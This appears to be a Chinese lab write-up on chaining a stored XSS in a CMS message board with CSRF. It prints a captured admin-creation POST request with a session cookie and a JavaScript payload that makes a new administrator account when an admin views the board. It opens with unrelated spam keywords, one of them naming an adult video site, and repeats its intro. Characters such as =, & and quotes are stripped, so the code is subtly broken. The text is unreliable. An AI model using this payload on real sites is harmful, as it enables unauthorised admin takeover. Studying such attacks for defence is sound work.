女与男做那个的视频网站,小程序怎么进入公众号,鞍山58同城网,郑州少儿编程培训机构项目背景#xff1a;
如下#xff1a;我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。
源码地址下载链接#xff1a;https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w 提取码#xff1a;4444 考察内容#xff1a;
…项目背景
如下我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。
源码地址下载链接https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w 提取码4444 考察内容
本次实验使用的存储型xss与csrf的联合使用。我们使用这两个漏洞可以使当管理员查看留言板后自动触发使其自动创建一个管理员账号。本网站并没有使用token值来防止csrf所以我们才能够利用。
前提我们是在拥有管理员权限的情况下进行的。
大致流程
1分析发现存储型xss漏洞
2发现该网站并无token值可以进行csrf
3使用js伪造创建管理员的form表单
4当管理员查看留言板后自动触发xss创建一个攻击者自己定义的管理员账号。 开始实验
1发现存储xss
发现该网站存在一个留言板其中的内容会存入数据库中管理员会不定期去查看留言板中的内容。如下经过测试我们发现当我们将恶意的js代码放到内容板块中存入数据库当管理员去查看留言信息后就会自动触发js恶意代码 管理员查看留言板可以发现自动弹窗了说明这里存在一个存储型xss。 2该网站并没有使用token值来防止csrf接下来我们使用抓包工具burp suite来抓创建管理员的包需要打开代理设置指向抓包工具burp suite这个操作比较简单不会的可以进行百度:
创建管理员页面 抓包 POST /admin/user.action.php HTTP/1.1
Host: cms:1234
Content-Length: 94
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
Origin: http://cms:1234
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Referer: http://cms:1234/admin/user.add.php?actadd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Cookie: usernameadmin; userid1; PHPSESSID0m903rglk205acbq8ol191q271
Connection: closeactaddusername2password2password22button%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7userid0
通过对抓到的包分析我们可以发现该包使用的是POST方式进行提交将参数提交到/admin/user.action.php进行处理。所以我们就可以根据这个包中的内容进行伪造。 3使用js伪造创建管理员账号的form表单
script
xmlhttp new XMLHttpRequest();
xmlhttp.open(post,http://cms:1234/admin/user.action.php,false);
xmlhttp.setRequestHeader(Content-type,application/x-www-form-urlencoded);
xmlhttp.send(actaddusernameDJJpassword123456password2123456button%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7userid0);
/script
整个js的操作是创建管理员的操作不过是由js自动触发。
xmlhttp.open提交地址
xmlhttp.setRequestHeaderpost的请求头
xmlhttp.sendpost中的参数创建的账号密码等 4将伪造的恶意js代码上传留言板当管理员查看留言信息后自动触发创建一个新的管理员账号。 5管理员查看留言板触发存储xss创建管理员账号。
如下当我们查看留言板后在去查看管理员账号信息发现已经自动创建了一个我们定义的管理员账号。